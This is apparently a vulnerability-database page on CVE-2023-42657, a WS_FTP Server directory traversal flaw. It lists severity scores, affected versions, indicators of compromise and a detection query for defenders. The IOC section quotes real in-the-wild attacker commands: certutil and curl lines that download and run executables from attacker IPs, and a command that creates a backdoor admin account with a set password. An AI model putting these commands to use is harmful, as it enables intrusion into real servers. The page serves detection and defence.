cbcvebase.
CVE-2023-42657
published 2023-09-27

CVE-2023-42657: In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to…

PriorityP183critical9.6CVSS 3.1
AVNACLPRLUINSCCNIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
17.03%
96.7th percentile
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.

Affected

4 ranges
VendorProductVersion rangeFixed in
progressws_ftp_server< 8.7.48.7.4
progressws_ftp_server>= 8.8.0 < 8.8.28.8.2
progress_software_corporationws_ftp_server>= 8.7.0 < 8.7.48.7.4
progress_software_corporationws_ftp_server>= 8.8.0 < 8.8.28.8.2

Detection & IOCsextracted from sources · hover to see the quote

ip103.163.187.12
urlhxxp://103.163.187.12:8080/3P37p073LKuQjOE64pjEVw
urlhxxp://103.163.187.12:8080/c8e3vG0e3TMiqcjcZOXhhA
urlhxxp://103.163.187.12:8080/cz3eKnhcaD0Fik7Eexo66A
urlhxxp://103.163.187.12:8080/Sw8J6d3NVuvrBiTCXrg4Og
urlhxxp://103.163.187.12:8080/xkJ5de2brMfvCNNnBoRRAg
urlhxxp://141.255.167.250:8081/o1X7qlIaYzSmCj.hta
urlhxxp://176.105.255.46:8080/aqmCG0mZlo_xnZRAWbz6MQ
urlhxxp://176.105.255.46:8080/OFmLqOxFRIkoENjCZsC7OQ
urlhxxp://176.105.255.46:8080/Rn0KQbPo22laaUbKGy30sg
urlhxxp://81.19.135.226:8080/_1TZ--18Hpqm06wvtjLMAg
urlhxxps://filebin.net/soa40iww2w8jhgnd/svchostt.dll
urlhxxps://tmpfiles.org/dl/2669123/client.txt
urlhxxps://tmpfiles.org/dl/2669853/client.txt
urlhxxps://tmpfiles.org/dl/2671793/sl.txt
urlhxxp://34.77.65.112:25565
url45.93.138.44/cl.exe
ip34.77.65.112
ip45.93.138.44
ip81.19.135.226
ip141.255.167.250
ip176.105.255.46
domain2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com
domainbgvozb1wnz86q952zxjlwusv2m8gw5.oastify.com
domainqzt3iqkb6erl9oohic20f9bal1rsfh.oastify.com
hash1d41e0783c523954ad12d950c3805762a1218ba6
hash1d7b08bf5ca551272066f40d8d55a7c197b2f590
hash32548a7ef421e8e838fa31fc13723d44315f1232
hash3fe67f2c719696b7d02a3c648803971d4d1fd18c
hash40b2d3a6a701423412bb93b7c259180eb1221d68
hash65426816ef29c736b79e1969994adf2e74b10ad8
hash790dcfb91eb727b04d348e2ed492090d16c6dd3e
hash83140ae9951b66fba6da07e04bfbba4e9228cbb8
hash83e6ede4c5f1c5e4d5cd12242b3283e9c48eea7e
hash8c14a4e7cee861b2fad726fc8dd0e0ae27164890
hash8dbca2f55c2728b1a84f93141e0b2a5b87fa7d35
hash923fd8fb3ddc1358cc2791ba1931bb4b29580bb6
hash98321d034ddc77fe196c6b145f126b0477b32db9
hashb4a5bf6c9f113165409c35726aec67ff66490787
hashb70aa1d07138b5cae8dd95feba9189f1238ee158
hashd00169f5eff9e0f2b5b1d473c0ee4fe9a3d8980e
hashd669b3977ebebf7611dd2cb1d09c31b3f506e9bd
hashe5ac227f143ec3f815e475c0b4f4f852565e1e76
hashf045a41def1752e7f8ef38d4ce1f7bd5e01490fc
filenamexmpp.exe
pathC:\programdata\xmpp.exe
pathC:\programdata\ft.exe
filenamesvchostt.dll
command/c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} %TEMP%\{10-length-alpha-string}.exe & start /B %TEMP%\{same-10-length-alpha-string}.exe
command/c cmd.exe /C curl 45[.]93[.]138[.]44/cl.exe -o C:/cl.exe
command-i -c "cmd /c net user temp p@ssw0rd123 /add && net localgroup administrators temp /add"
sigma
endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains ('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')
  • Exploitation of CVE-2023-42657 spawns child processes from w3wp.exe running under the 'WSFTPSVR_WTM' application pool; hunt for w3wp.exe with cmdline containing 'WSFTPSVR_WTM' spawning certutil, mshta, powershell, pwsh, cmd, curl, wmic, nslookup, ping, or whoami
  • Attack Chain 1 uses certutil with -urlcache flag to download and execute a payload from an IP-literal URL on port 8080 with a 22-character alphanumeric path; monitor certutil.exe spawned by w3wp.exe with -urlcache arguments
  • Attack Chain 2 uses curl to download cl.exe to C:\ root and then executes it directly; monitor for curl spawned by w3wp.exe writing executables to C:\ and subsequent execution of C:/cl.exe
  • Attack Chain 2 also uses OOB DNS callbacks to oastify.com subdomains for exploitation confirmation; monitor DNS queries to *.oastify.com from WS_FTP server processes
  • Attack Chain 3 drops executables (n1.exe, n2.exe, s.exe, xmpp.exe, ft.exe) to C:\ProgramData and creates a local admin account named 'temp' with password 'p@ssw0rd123'; monitor for net user/localgroup commands and new files in C:\ProgramData from w3wp.exe lineage
  • ·Exploitation began September 30, 2023; only WS_FTP Server versions prior to 8.7.4 and 8.8.2 are vulnerable — patched versions are not affected
  • ·The vulnerability requires a low-complexity attack with no user interaction per CVSS:3.1 scoring, meaning internet-exposed WS_FTP servers are at high risk of opportunistic scanning and exploitation
  • ·Upgrading using the full installer is the only remediation path; partial patches are insufficient

CVSS provenance

nvdv3.19.6CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
vulncheck9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.